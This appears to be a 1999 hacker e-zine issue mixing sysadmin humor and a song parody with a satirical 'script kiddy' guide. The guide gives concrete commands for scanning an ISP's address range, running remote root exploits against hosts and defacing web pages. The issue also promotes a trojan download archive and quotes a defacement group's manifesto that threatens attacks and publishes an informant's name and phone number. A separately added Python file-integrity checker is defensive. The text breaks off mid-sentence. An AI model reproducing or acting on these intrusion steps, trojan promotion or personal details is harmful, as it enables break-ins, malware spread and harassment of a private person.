       CWD variables with putenv(3), but that doesn't seem to have any effect.
       
       What it really seems to me, is I need some way of telling the shell what
       directory it's supposed to be in when my program is done executing.
       Put more simply, I need a way of modifying the environment of a parent
       process.
       
       E-mail responses only.  There's too much noise on this bboard for me to
       be able to read it.  And HURRY!!!  I need to turn this project in by 5pm
       tonight !!!!
       
        +----------------------------------------------------------------------------+
        |         _   /|                                                             |
        |         \'o.O'           UNIX Guru in training                             |
        |         =(___)=                                                            |
        |            U             Joe Programmer                                    |
        |     ACK.. THPPT!!!!      cs245@cs.somewhere.edu                            |
        |                                                                            |
        +----------------------------------------------------------------------------+
       
       --
       - Steve Baur@mdcbbs.com  (236/607 4/1/92)
       --
       
       

       
       
                                                             
       System Administration Support Fees
       
       Support Fees:
       
            Calling me with a question - $10 
            Calling me with a stupid question - $20 
            Calling me with a stupid question you can't quite articulate - $30 
            Implying I'm incompetent because I can't interpret your inarticulate problem description - $1000 + punitive damages 
            Questions received via phone without first trying help desk - $10.00 
            Questions where answer is in TFM - $100.00 
            Calling me back with the same problem *after* I fix it once - $100 
            Insisting that you're not breaking the software, the problem is on my end somehow - $200 
            Asking me to walk over to your building to fix the problem - $5/step 
            Asking me to drive to another town to fix your problem - $50/mile + gas 
            If you interrupt me while I was trying to actually fix somebody else's problem - $45/hr 
            If you try to hang around and get me to fix it now - $50/hr 
            If you expect me to tell you how I fixed it - $60/hr 
            If you've come to ask me why something isn't working that I'm currently working on - $70/hr 
            If you're asking me to fix something I fixed for you yesterday - $75/hr 
            If you're asking me to fix something I told you I fixed yesterday, but never did fix - $85/hr 
            If you're asking me to fix a quick patch that I made that didn't work - $95/hr 
            If you're bugging me while there's another admin in the room who could have done it for you - $150/hr 
            Making me trek to your office to fix your problem then leaving immediately after hanging up the phone - $1500.00 
            Calling up with a problem which "everybody" in the office is having and which is "stopping all work." Not being there when I rush over to look at it and
            nobody else in the office knows anything about it. - $1700.00 
            Explaining a problem for 1/2 hour over the phone BEFORE mentioning it's your personal machine at home - $500.00 
            Self-diagnosing your problem and informing me what to do - $150.00 
            Having me bail you out when you perform your own repairs I told you not to do - $300.00 
            Not telling all of your co-workers about it - $850.00 
            Figuring out you mean floppy drive when you say hard drive - $50.00 
            BEFORE I order your replacement hard drive - $250.00 
            Fixing your "broken" mouse with a mousepad - $25.00 
            Fixing your "broken" optical mouse by rotating the mousepad 90 degrees - $35.00 
            Fixing a "broken" mouse by cleaning the rollers - $50.00 
            Fixing your "broken" printer with an ink/toner cartridge - $35.00 
            Fixing your "broken" ANYTHING with the power button - $250.00 
            Fixing the "crashed" system by turning the external disk back on - $200.00 
             Fixing the "hung" system by plugging the ethernet transceiver back in - $375.00 
             Fixing the crashed nameserver by plugging back in the SCSI cord someone accidentally yanked out on Friday afternoon when the 'real' sysadmin has just left
            for a two week vacation - $400 
            Visiting your old university and fixing the broken PC by plugging the monitor lead back in - $50 
            Explaining that you can't log in to some server because you don't have an account there - $10 
            Explaining that you don't have an account on the machine you used to have an account on because you used it to try to break into the above server - $500 
            Forgetting your password after it was tattooed on your index finger - $25 
            Changing memory partitions without informing me first - $50 
            Installing programs without informing me /getting permission first - $100 per program 
            Technical support for the above programs - $150 per hour (regardless of whether I know the program or not :)) 
            Spilling coke on keyboard - $25 plus cost of keyboard 
            Spilling coke on monitor - $50 plus cost of monitor 
            Spilling coke on CPU - $200 plus cost of motherboard swap plus hourly rate of $150 per hour spent reinstalling the system 
            Leaving files on desktop - $5 per file, $10 per day the file is left unclaimed 
            Cleaning the mouse with spit and sleeve - $50 plus cost of sleeve plus cost of therapy :) 
            Bringing in your own copy of the original Norton Utilities v1.0 to fix a brand new machine - $200 
            Chewing on the end of the graphic tablet stylus - $25 
            Putting feet up next to workstation after ten mile jog through NYC streets - $50 
             Spending 30 minutes trying to figure out what your problem is, and another 5 explaining how to verify and fix it, only to hear you say... "So that's what the little
            box that popped up on my screen was telling me to do!" - $40 
            Listening to your network troubles, suggesting that you check to see if you are plugged into the network jack, hearing yes, trying five other things, asking you
            to identify your plug type, listening to you drag furniture, and hearing a sheepish, "Oops. Nevermind." - $35 (including discount for polite apology) 
            Dealing with tech support requests for obviously pirated software - $25 
            Dealing with "How can I get another copy of [obviously pirated software]? Mine just died." requests - $45 
            Having to use the "We're really not the best people to talk to about that; why don't you try calling the number on the box in which you bought it?" line - $55 
            Actually needing to explain copyright law to you after you failed to get the hint in the previous response - $95 (includes instructions for getting freeware
            replacements from the public file server) 
            Having to point out anything that's on the wall in a typeface larger than 18 points - $15 
            If I wrote the sign - $45 
            If it's in a 144 point font and taped to the side of the monitor facing the door - $75 
            Reporting slow connection by passenger pigeon packets to MPEG archive in Outer Slobavia as a Mosaic/Netscape/Gopher/FTP client problem - $25.00 
            Reporting it more than once - $50.00 
             Reporting it more than once and implying slothfulness on tech support's inability to solve problem - $200.00 
       
       Beeper Prices:
       
            Beeping me when I'm out with the significant other - $50 
             Beeping me when I'm out of town and I took pains to ensure that help files were left all over and that diagnostics had been run on all machines before I left -
            $100 
            Beeping me more than once to tell me that the printer's offline and the fix is to press the On Line button - $200 
            Beeping me more than once while I'm asleep - $50 per beep 
            Beeping me and not identifying yourself within the first 5 seconds - $25 
            Beeping me and then changing your story / denying you placed the call / hoped I would forget who caused the problem - $500 
       
       Special Rates:
       
            Dealing with user body odor - $75.00/hour 
            Dealing with user not familiar with the primary language spoken at site - $50.00/hour 
            Dealing with user who is (self-proclaimed) smarter than you are, but still calls every other day for help - $100.00/hour 
             Dealing with computer hobbyists - $125.00/hour 
            Questioning the other prices .................................$50 
       

        -=-
       
       A Day in the Life of a SysAdmin
       by Thomas Farrell, tfarrell@lynx.dac.neu.edu 
       
       The life of a sysadmin goes approximately as follows. 
       
       8am: Your pager goes off and wakes you up. The message says it's the office, and it's a crisis. You roll out of bed moaning. 
       
       8:15am: You are now sufficiently awake to phone the office. Your pager has gone off three times already. You get through to the office and the receptionist is frantic.
       She says nobody in the entire office can print and they have a major proposal that has to be faxed out before 9am and if it isn't the company could lose a million
       dollars in new business. You try to get her to explain what's wrong, but she's incoherent. 
       
       8:30am: You're dressed in yesterday's dirty clothes (they were all you could find in time) and running out the door, sipping a Jolt cola and hailing a cab to the office. 
       
       8:45am: You arrive at the office. 
       
       8:46am: You determine that the problem is that the printer is turned off, and you turn it back on. 10,000 pages spew out from the hundreds of multiple failed
       attempts by all of your coworkers to print. 
       
       8:47am: Your boss reams you out for "not having fixed that printer problem last time when you said it was all taken care of." You spend the next hour explaining that
       there's nothing you can do to stop people from turning off the printer if they really want to. You don't bother to mention that you happen to know that the person
       who did it is your boss's spouse. 
       
       9:45ish: You finally convince your boss to release you and make your way to your office, assaulted all along the way by people demanding that you must help them
       fix things right now that you know are going to take weeks and really aren't priority. 
       
       10am: You finally arrive at your office and shut and lock the door to keep out the users. You start to read the 40 or so email messages you find waiting every
       morning, which include about 5 new requests, 34 or so messages demanding to know why such and such hasn't gotten done yet, and one message from your boss
       denying your request to have an assistant and demanding that you justify how you spend your time yet again. 
       
       10:30am: You realize that you're never going to finish getting through your email if you keep getting interrupted by these damned telephone calls from the same
       people who sent you the email asking the same questions, so you put your phone on do-not-disturb and go back to your email. 
       
       11am: You've just finished responding to all of your email, including the umpteen millionth justification of your existence for your boss. Unfortunately, the secretary
       has figured out how to order the phone system to override your do-not-disturb on your phone, and is now routing all the angry phone calls from your coworkers to
       you. 
       
       11:30am: You finish talking to everyone on the phone and calming them down. 
       
       11:30am-4:30pm: You work your ass off on whatever projects have the most urgency to the company. Usually this involves a lot of work with software, crawling
       around on the floor several times, tearing a hole in your clothing, and banging your head (hard) on the bottom of a desk. 
       
       3pm: You have your lunch delivered to your office. 
       
       4:30pm: You finally get to touch your lunch, and realize that Burger King french fries do not taste good cold. You're on about your 15th coke since arriving in the
       office. 
       
        4:35pm: Your lunch is over. You're not finished eating, but your boss has just phoned you (he knows how to override the DND on the phone too) and demanded
        that you drop everything and go fix some asinine problem which you know is caused by the user and which you fix every week and which you have warned the user
        about but about which they just don't listen. 
       
       6:30pm: You finish the project your boss set you to and decide to try to sneak out of the office and go home. (Not that you have a social life or anything, but you
       haven't had 8 hours sleep in a month and a half.) In the elevator on the way out of the office you encounter a coworker, who grabs you by the ear and drags you
       back to the office to fix something that's bugging them. 
       
        6:30pm-8pm: Somehow, despite repeated attempts to leave, the moment you try to actually do so, someone else appears to force you to work. 
       
       8pm: You're about to depart when you're suddenly informed that there's some vitally urgent data processing that has to be done and that only you know how to do
       and which can't be performed until all of the data entry people have left for the night at 10pm. 
       
       8pm-10pm: You try to nap in your office but the phone keeps ringing so you finally give up and put in several more hours of working. 
       
       10pm: You try to do your data processing but can't because there are still people logged into the data acquisition system. You spend the next fifteen minutes running
       around begging them to log out, and they reply that "yeah, I'll be out in a minute..." 
       
       10:20pm: You get sick of waiting, walk over to the server console, issue commands to kick off all the users, and disable logins. 
       
       10:30pm-2:30am: You perform that data processing which nobody else could do because they won't let you teach them because they know what kind of hours you
       have to put in doing it. 
       
       Midnight: Your blood turns to coca-cola. 
       
       2:30am: You realize that the data processing isn't QUITE done but you're about to pass out so you re-enable logins so you won't get paged about THAT in the
       morning, scrounge a taxi voucher out of your desk (they've given you your own pad because you use them so often), call a taxi, and leave the building. 
       
       2:45am-3:15am: You freeze your ass off waiting for a taxi. 
       
       3:15am-3:30am: The taxi takes you home. The driver seems to have decided to take the scenic route for the hell of it. 
       
       3:31am: You collapse in a heap on your bed and fall asleep face down with your shoes on the pillows and your clothes still on because you're too tired to remove
       your clothes or even orient yourself properly on the bed. 
       
       8:00am: Your pager goes off. 
       
        Repeat ad nauseam until your boss doesn't like your response to one of his "justify your existence" demands and fires you or you die of caffeine poisoning. Oh, and
        don't bother factoring in any weekends or holidays: You'll be expected to work those too. 
       
       Now do you have some slight understanding of why I don't like being a sysadmin? I really lived like this for about a year. I'm amazed I survived it. 
       
              
       
       -=-
       
       As true then as it is now, from 1992.
       
       Network Admin Job Descr

       From UGANET@uga.cc.uga.edu  Tue Apr 28 09:17:17 1992
       Return-Path: [UGANET@uga.cc.uga.edu]
       Received: from uga.cc.uga.edu by marie.stat.uga.edu (4.1/SMI-4.1)
               id AA17223; Tue, 28 Apr 92 09:17:17 EDT
       Message-Id: [9204281317.AA17223@marie.stat.uga.edu]
       Received: from UGA.CC.UGA.EDU by uga.cc.uga.edu (IBM VM SMTP R1.2.2MX) with BSMTP id 4057; Tue, 28 Apr 92 09:15:46 EDT
       Received: from UGA.BITNET by UGA.CC.UGA.EDU (Mailer R2.07) with BSMTP id 8820;
        Tue, 28 Apr 92 09:15:44 EDT
       Date:         Tue, 28 Apr 1992 09:13:01 EDT
       Reply-To: "David Matthews-Morgan" [DMM@uga.cc.uga.edu]
       Sender: Technical Discussion for UGA Networking [UGANET@uga.cc.uga.edu]
       From: "David Matthews-Morgan" [DMM@uga.cc.uga.edu]
       Subject:      A Network Posting for Your Amusement
       To: Multiple recipients of list UGANET [UGANET@UGA.BITNET]
       Status: OR
       
       This posting seems to fit what many of us are experiencing as network
       managers.  Does this strike a chord with anyone here?
       
                                     2
                                   DM
       
       ---------------------------- Original Message ------------------------------
       
       From:         deljones%THAMA1.APGEA.ARMY.MIL@uga.cc.uga.edu
       Subject:      Re: Network Administrator Job Description
       X-To:         Novell@suvm.acs.syr.edu
       To:           Multiple recipients of list NOVELL [NOVELL@SUVM.BITNET]
       
       ]Our department is considering budgeting a full-time position for a network
       ]administrator.  Likely functions are network support, applications support,
       ]and liaison with computing center.
       
       ]Does anyone have a job description and salary info that might help us budget
       ]such a position?
       
       I am currently on about 35 pages of a job description.  It looks like 50 to 75
       tight pages before completion.
       
       Basically, the description is to know everything about computers, business,
       training, programming and hardware support and do everything, including
       forecast 5-15 years into the future.  Should have at least completed grade
       school equivalency. Have 10 years or more network experience with 20+ years of
       computer experience.  Needs CNE certification.  Be willing to work 24 hours a
       day, 7 days a week.  Must be willing to work for starvation wages and feel
       privileged to be able to work with all of the equipment.  Must be trustworthy,
       honest, kind and above all thrifty.  Must understand overtime is a luxury "we
       can not afford."  Should be able to write 30 pages of documentation for every
       10 minutes of installation work (spending no more than 10 minutes doing this
       documentation).  Requires an even temperament, realizing that the LAN Manager
       is a servant to all, master of none.  Should be able to learn any software
       package in 10 minutes, so as to perform a one day training seminar scheduled
       for NOW.  Must be willing to work in a converted closet with no windows or
       ventilation.  Must be willing to wear a beeper to the bathroom.  Must commit
       to giving a minimum of one year's notice before leaving.
       
       There are more requirements, but that gives the general gist.  Oh and by the
       way because of enlightened management, the salary should be at least 10% over
       minimal beginning secretarial wages.
       
       -Del
       
       

       
       Recently uploaded to PacketStorm; 
       
       Berkeley California - http://www.pressanykey.com/humor/berkeleysong.html

       Sung to the tune "Hotel California" by the Eagles 
       
       
       In a dark dim machine room 
       Cool A/C in my hair 
       Warm smell of silicon 
       Rising up through the air 
       Up ahead in the distance 
       I saw a Solarian(tm) light 
       My kernel grew heavy, and my disk grew slim 
       I had to halt(8) for the night 
       The backup spun in the tape drive 
       I heard a terminal bell 
       And I was thinking to myself 
       This could be BSD or USL 
       Then they started a lawsuit 
       And they showed me the way 
       There were salesmen down the corridor 
       I thought I heard them say 
       
       Welcome to Berkeley California 
       Such a lovely place 
       Such a lovely place (backgrounded) 
       Such a lovely trace(1) 
       Plenty of jobs at Berkeley California 
       Any time of year 
       Any time of year (backgrounded) 
       You can find one here 
       You can find one here 
       
        Their code was definitely twisted 
       But they've got the stock market trends 
       They've got a lot of pretty, pretty lawyers 
       That they call friends 
       How they dance in the courtroom 
       See BSDI sweat 
       Some sue to remember 
       Some sue to forget 
       So I called up Kernighan 
       Please bring me ctime(3) 
       He said 
       We haven't had that tm_year since 1969 
       And still those functions are calling from far away 
       Wake up Jobs in the middle of the night 
       Just to hear them say 
       
       Welcome to Berkeley California 
       Such a lovely Place 
       Such a lovely Place (backgrounded) 
       Such a lovely trace(1) 
       They're livin' it up suing Berkeley California 
       What a nice surprise 
       What a nice surprise (backgrounded) 
        Bring your alibis 
       
       Windows NT a dreaming 
       Pink OS on ice 
       And they said 
       We are all just prisoners here 
       Of a marketing device 
        And in the judge's chambers 
       They gathered for the feast 
       They diff(1)'d the source code listings 
       But they can't kill -9 the beast 
       Last thing I remember 
       I was restore(8)'ing | more(1) 
       I had to find the soft link back to the path I was before 
       sleep(3) said the pagedaemon 
       We are programmed to recv(2) 
       You can swap out any time you like 
       But you can never leave(1) 
       
        [ substitute whirring of disk and tape drives for guitar solo ] 
       
       Written by David Barr 
       and Ken Hornstein 
       and a little help from Greg Nagy

       
       http://www.genocide2600.com/~tattooman/unix-humor/script-kiddy-HOWTO
       After you're done reading the access denied msg when you try going up dirs manually
       heres the 'side door' : http://www.genocide2600.com/~tattooman/new.shtml  ;-)

       How-to Be a sKr1pt k1ddi3 by DrHamstuh
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       /* This , Like the world is only what you perceive it to be */
       
       Q:"How Do I Become A Hacker?"
       A: learn to code , install SunOS , get a SPARC , devote the rest of your
       life to computers and technology
       
       Q: well fuck that I'm lazy , how do i become a script kiddy?
       A: hmm I guess i can show you , whatever you do with this Info is your
       fault not mine...
       
       
       First things first , I am taking it you have Linux installed and a
        connection to the net.  If you are still on Windows* [TM] (C) (R)
       then please look into getting a linux CD-ROM from www.cheapbytes.com
       install linux , setup PPP [if in redhat just startx and use netcfg pussy]
       and come back and read this again ... thanx
       
       -=-=-=-=- t0p s3kr3t 0nly l1nux k1ddyZ c4n r3ad bel0w th1z l1n3 -=-=-=-=-
       /* top secret hamstuh encryption */
       JLKADJFLK;ASDFJLKSA;DJFLASK;DFJSLAKFJLAKSDFJLASKFJDLSKDJF
       
       * tools *
       mountd remote exploit code
        named remote exploit code
       imap remote exploit codes 
       wu-ftpd remote exploit code
       Security Scanner. SSCAN by JSBACH
       listen remote exploit code
       q-pop remote exploit code
       ICQ bomber & flooder source code
       Denial Of Service code
       BitchX 
       BitchX War Scripts
       * tools EOF *
       
       
       * general idea *
        Cause as much trouble with the tools you have as possible
        figure out what each tool does and how / why it works
        overall have fun with people and consider yourself better
       than them because you can use teardrop.c to freeze their windows 
       computer or ADMmountd.c to break into their elite red hat 5.1 box
       
       * getting started *
        to get started first you have to be able to walk ,
       being able to walk is relative to this as being able to move around
       your operating system. if you are "hacking" from a linux box [ YAY ]
       then these commands will help you.
       
       mkdir = creates a dir
       mv = move , rename
       cp = copy
       rm = remove 
       id = shows you who you are
       w  = shows you who's logged in
       tail -f = lets you watch a file as text is added to it in real time 
       echo = add's text to a file 
       cd = changes your directory 
       
        those are some of the basics now you should be able to get started.
       
       ===============================================================================
       
       HOT TIP: make a dir in your base directory called .anythingsecret
       the . makes it not able to be shown to a regular ls , kind of hides it.
       
       HOT TIP: put all your "hacking" files in that .anythingsecret DIR 
       keep everything clean and in order and it will be a ton easier to keep
       your thoughts 2gether and in the long run you may have more "r00t shellz" 
       
       -----------------------------------------------------------------------------
       "r00t shellz" : in my earlier days i was told by someone who had
       been  on the scene for a long time , longer than i had that "root shells"
       are pretty much what you judge your eliteness on. 
       ------------------------------------------------------------------------------
       
       There are NO rules to being a script kiddy ,
        and NO morals are enforced upon you ,
       your actions are your actions ,
       and what you see fit to do will always be looked at by others and judged.
       
       ------------------------------------------------------------------------------
       
       I want to..
       A] hack shit now.
       B] get on IRC and learn more before i continue my life as a script kiddy
       C] change my mind and go get a sparc and be a real haxor
       
       if you said A then you have the mentality it takes to be a true script
       kiddy and im not going to hold you back any longer .. lets get started on
       talking about how to break into those krad red hat systems...
       
       If you just want to hack ANY computer on any network
       then i suggest just letting your Security Scanner scan
       for a long time and then picking the computers out of your 
       scanners log file that look like you would be able to gain access to the
       easiest. [ mountd / named / imap ] 
       
       If you are using SSCAN (tm) JSBACH, and are ready to hack some shit NOW.
       then start SSCAN running on some small town ISP..
       
       ie:
       home@linux# ./sscan localisp.com/24 >> hot.list &
       
       
       once the scanning has completed then use your favorite word editor [PICO@#%]
       and read the file.. look for where SSCAN has told you that a server is
       mountd/imap/or named overflowable.. and then just try all the servers
       listed with the exploit that it is listed for... surely after a while one
       will work.. even the sun shines on a cluebie script kiddy's ass some day.
       
       [ gcc -o rotshb rotshb.c ]
       ./rotshb server.com 4 1
       
       [ gcc -o mountd ADMmountd.c ]
       ./mountd server.com
       
       [ gcc -o imapk1ller imapexploit.c ]
       ./imapk1ller host.com offset
       
        you will know when your exploit worked and when you have root ,
        and you will probably get a funny little feeling , kind of an excited
        feeling that will be your motivation to do this again.. 
       
       now once you have root you are ready for the beef of a script kiddys
       life....
       
        changing HTML.. a script kiddy changes HTML in many ways for many
        reasons.. the funnier hacks i have seen are hacks that are supposed to be
        serious in which script kiddys voice their opinions on various things ..
        from the soup at school not tasting good to the government just any
        opinion that they have in their little brains .. 
       
       [ find / -name index.html ]
       root@hackedbox# echo " i own you " >> /home/httpd/html/index.html
       
       now that you have defaced your first web page , get on IRC and brag about
       it , as a script kiddy its something that you HAVE to do.. 
       
       load up BitchX and your War Script [ Civic.bx ] and head on over to
       TeenChat on EFNET.. scroll the URL to the page you just "hacked" and if
       anyone says anything negative to you say " Shut Up Bitch I Own You "
       and nuke them with /teardrop or any other elite d.o.s alias your war
       script may have.. you are now on your way to being a super ereet script
        kiddy.. by now you have probably already caused a stir in the underground
        and JP from AntiOnline.com is going to interview you because you hacked
        the first jewish server that was ever run off linux .. and now the pope
        thinks you are the anti-christ and has been talking about you as an evil
        haxer all week on the news.. JP sees a chance to exploit you and make
        money off your teen ignorance and does so in a graceful manner.
       
       now your ego is larger then your IQ ,
       you know how to root a server ,
       you know how to D.o.S anyone on IRC ,
       you are confident ,
       you are clueless ,
       you think you are a god ,
       you have younger want to be script kiddys worshiping you ,
        you are at the pinnacle of your script kiddy life ,
       
        now take your ICQ flooders / bombers and harass everyone on your ICQ list
       for no obvious reason..
       
       you are now a Script Kiddy .. enjoy your new life of stupidity...
       
       in about a year you will realize that being a script kiddy is nothing but
       a waste of time.. and sure you have learnt your way around linux like a
        small town with only one street to pick up hookers , but you still have a
        long way to go before you are corporate material.. and once you decide
       computers are your dream and thats what you want to do for the rest of
       your life you notice that you wasted the last year and a half  being a
       script kiddy .. inflating your teen ego .. hurting lil web servers for no
       reason other than the thrill of the hack.. heh
       
       
        ---- another useless rant by DrHamstuh
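        A defender-side counterpart to the web-page defacement walked through in the rant above (a line appended to index.html), added here as an example that is not part of the zine or of DrHamstuh's text: a SHA-256 manifest of the document root, saved as JSON, that later flags modified, added and removed files. The web root, its pages and the stray .bak file are constructed sample data.

```python
"""Web-root integrity check: spot a defaced or swapped page after the fact.

Added example, not code from the zine or from DrHamstuh. It hashes every
file under a document root into a JSON manifest taken while the site is
known-good, then diffs the live tree against that manifest. An appended
line in index.html, a replaced page, or a backup file an intruder left
behind all show up. Root, pages and contents are constructed sample data.
"""
import hashlib
import json
import os
import tempfile


def hash_file(path):
    """SHA-256 of a file, read in chunks so large assets are not loaded whole."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map each file's path (relative to root, '/' separated) to its digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # do not follow links that may point outside the root
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = hash_file(full)
    return manifest


def save_manifest(manifest, path):
    """Write the baseline; in practice keep this copy off the web server."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(manifest, fh, indent=2, sort_keys=True)


def load_manifest(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def compare(baseline, current):
    """Return the modified, added and removed paths, each list sorted."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "removed": removed}


def demo():
    """Constructed scenario: baseline a tiny web root, then deface it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    manifest_path = os.path.join(tempfile.mkdtemp(prefix="baseline-"), "manifest.json")

    pages = {
        "index.html": "<html><body>Welcome</body></html>\n",
        "about/team.html": "<html><body>Our team</body></html>\n",
    }
    for rel, body in pages.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)

    # Baseline taken while the site is known-good.
    save_manifest(build_manifest(root), manifest_path)

    # Simulated defacement as in the rant: text appended to index.html,
    # plus the backup copy such an intruder often leaves next to it.
    with open(os.path.join(root, "index.html"), "a", encoding="utf-8") as fh:
        fh.write(" i own you \n")
    with open(os.path.join(root, "index.html.bak"), "w", encoding="utf-8") as fh:
        fh.write(pages["index.html"])

    return compare(load_manifest(manifest_path), build_manifest(root))


if __name__ == "__main__":
    report = demo()
    for kind in ("modified", "added", "removed"):
        for path in report[kind]:
            print(f"{kind:8s} {path}")
```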

       

       @HWA
       
  HOW.TO How to hack part 3
         ~~~~~~~~~~~~~~~~~~
         
         To be continued (probably) in a future issue... if time permits
         and inclination is prevalent. i.e.: if & when I feel like it.. :p
         (discontinued until further notice)
         
         Meanwhile read this: 
                         
                          http://www.nmrc.org/faqs/hackfaq/hackfaq.html
          And especially, this:
          
                          http://www.tuxedo.org/~esr/faqs/hacker-howto.html
                          (published in its entirety in issue #12)
                          
         @HWA
       
       
  SITE.1 Featured site: http://www.hackworld.freeserve.co.uk/look/trojanx.htm
         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         
       This site constantly has some of the newest and hardest to find trojans
        around... check it out, no banner click games here.
       
       http://www.hackworld.freeserve.co.uk/look/trojanx.htm
       
       A shot from their front page:
       
       Welcome to our trojan archive. We have some very rare and very
       new trojans here including the rare Netbus 1.20 and the very good
       new Netbus 2.0. Enjoy!

        Feel free to E-mail me with any comments or ideas. You might even get an answer.



        Name                       Description

        Subseven 1.1               An updated version with many new features including an
                                   offline keylogger
        Subseven                   Brand spanking new trojan for you guys. Its a netbus/bo
                                   clone with a good interface. Released 28/2/99!
         NetRex                     Same as Netbus 2.0 except it doesn't have the installation
                                    files.
         Netbus 2.0                 Its out! The netbus 2.0 beta. This version has a new interface
                                    and a lot more functions. Download it now
        Netbus1.20                 A very old and rare version of the popular trojan.
        
         BOclient 1.4               Brand new client for BO with multiple ip feed , built in send
                                    and receive TCP and a lot more
        Wincrash                   Very new trojan with some neat functions, like disabling ctrl +
                                   alt + del.
        Executer                   Very new trojan with some neat functions, destructive
                                   functions
        Backend                    Back orifice with a supposedly more user friendly interface
        
        Girlfriend                 A good scarce trojan used mainly to for getting passwords of
                                   other computers.
         Fatal network error        Outputs a message box to the screen saying that a fatal
                                    network error has occurred and prompts for username and
                                    password. Writes this info to c:\os32779.sys in plain text
         Millenium                  Hot off the shelves, new trojan, has some good functions,
                                    May possibly contain a virus!
         Netbus 1.60                version 1.6 of the very good and simple to use trojan.
                                    Recommended
         Netbus 1.70                Version 1.7 of the very good and simple to use trojan.
                                    Recommended
        Whackjob                   A game containing the netbus trojan, when the user plays it
                                   the trojan is installed
        Back orifice               Probably the best known trojan, a bit more difficult than
                                   netbus
         Gatecrasher                A little known trojan, similar to netbus but not as good
        
        Deepthroat                 Another little known trojan, quite easy to use not that
                                   complicated.
         Masters paradise 8         In French, Would be the best except causes lots of errors
       
       
         
         
  H.W  Hacked websites 
       ~~~~~~~~~~~~~~~~

     Note: The hacked site reports stay, especially with some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mug's game! - Ed

         * Hackers Against Racist Propaganda (See issue #7)
         
     
         Several sites were cracked in support of hacker/cracker Jason Mewhiney
         who recently 'defaced' a nasa website.
         
         The page's message is archived on HNN...
         
         http://www.hackernews.com/archive/1999/oreilly/index.html         
          
          * See archive for further details     
                          
                          Brother Mandalo explains: 
                          

        On April 1st, 1998, Jason Mewhiney was arrested by the RCMP for allegedly
       defacing the NASA web page: http://www.hq.nasa.gov. This arrest was originally
      attributed by the press to a 3 year investigation by the RCMP/FBI. Nothing could
        be further from the truth. In actual truth, this arrest was the result of hearsay coming
       from a 20 year old paid informant by the name of Nick Potkay (whose phone #
      incidentally is: (203) 746-0734). It's nice that the FBI can make arrests in Canada
        based upon the word of a socially inept kid such as Nicholas Potkay isn't it? 

        This is your wake up call, we are making a declaration of war against all who
       would challenge the freedom of Canadians with such ludicrous actions! We have
       broken into your phone companies, your breweries; everything you hold sacred!
        And we will continue to defile corporate Canadian privacy until the bullshit
           agendas of the Yanks are cast aside and realized for what they are! 

             Let us examine for just a moment the bullshit tactics of NASA:

        The hack done at Nasa was merely a change to ONE file in the html directory,
        index.html and NASA claims it took over 200 man hours for them to correct this
        situation. Are we to believe that it takes 200 hours for a team of NASA employees
        to reinstall one computer and re-install the contents of that box from tape backup?
        These numbers are totally arbitrary. If these numbers are accurate, then it is not
        so difficult to imagine how a tragedy such as the Challenger explosion could
        occur! 

        Your friendly neighbourhood "rocket scientists" at NASA are obviously fabricating
        these numbers in order to get the FBI to pursue Jason Mewhiney. Seventy-four
        thousand dollars to issue a couple of commands and replace the altered page?
        The calculators at NASA must have the zero key stuck or something. Seventy-four
        dollars perhaps, but seventy-four thousand? The painful reality is this: Jason is
        obviously a scapegoat for NASA's inability to secure their so called "critical" web
        site. 

                       And Brother Micherob elucidates:

      th3 fb1 4nd rcMp, al0ng w1th n4s4, kl41m th4t a k1d wh0 all3g3dly (ev1d3nc3 1z
         3xtr3m3ly w34k) br0k3 1nt0 www.nasa.gov & ch4ng3d th31r w3bp4g3, h4z
        s0meh0w kAuz3d $70,000 w0rth 0f d4m4g3 & 200 h0urz 0f l0st m4n-t1m3 (t0
                      r3-1nst4ll a d1g1t4l un1x m4ch1n3) .

      pAus3 f()r a s3k0nd & l3tZ k0ns1d3r th1s.. n4s4 h4z 1n t0t4l 100z 0f th0u$4ndz 0f
         m4ch1n3zZ. 1ph th1z kl41m 0f 200 h0Urz 0f m4n t1m3 1z 3v3n r3m0t3lY
      r34l1$t1k, th1z w0Uld m34n n4sa h4z b33n 1nst4ll1ng b0x3z s1nc3 th3 1c3 4g3.

        l3tz ex4m1n3 th1Z sUm 0f $70,000.. 1n 0rd3r t0 r3st0r3 th3 p4g3, n4s4 d1d:

                        # mv index.html.bak index.html

      (1t wUz b4ck3d uP by th3 'm4l1c10us 4nd 3v1l h4ck3r-tYp3' wh0 d1d 1t) 1ph th4t
        c0st $70,000 1t'z n0 w0nd3r th3 U.S. d3f1c1t 1z s0 hUg3.m4yb3 th3y sh0Uld
      ex4m1n3 th31r 3xp3nd1tUr3z 4 l1ttl3 m0r3 cl0Z3ly.. sUm1 sh0uld a$k th3m h0w
       mUch 1t k0zT u.s. t4xyp4y 3rz t0 flY RCMP p30pl3 d0wn, h4v3 th3m st4Y 1n
      h0t3lz & att3nd s3m1n4rz, h0w mUch th1$ tr14l 1z c0st1ng t0 b0th am3r1c4nz &
      k4n4d1aNz, 3tc., 3tc.. th3n s1t b4k & w4tch th3m 4tt3mpt t0 jU$t1fY th1s c1rcU$.

                Finally, some parting words from Brother Mandabarb:

      And so we come to an end of our diatribe. I hope you have enjoyed our spectacle.
        Remember -- in the future, question what you read. But most of all, phear -- For
                       the Yorkshire Posse hath arrived.


       The original site that got hacked had these words on it: (NASA. 1998)
       
       (H4G1S > NASA)


       Gr33t1ngs fr0m th3 m3mb3rs 0f H4G1S.
       
       Our mission is to continue where our colleagues the ILF left off. During the next month, we the members of H4G1S, will be launching an attack on corporate
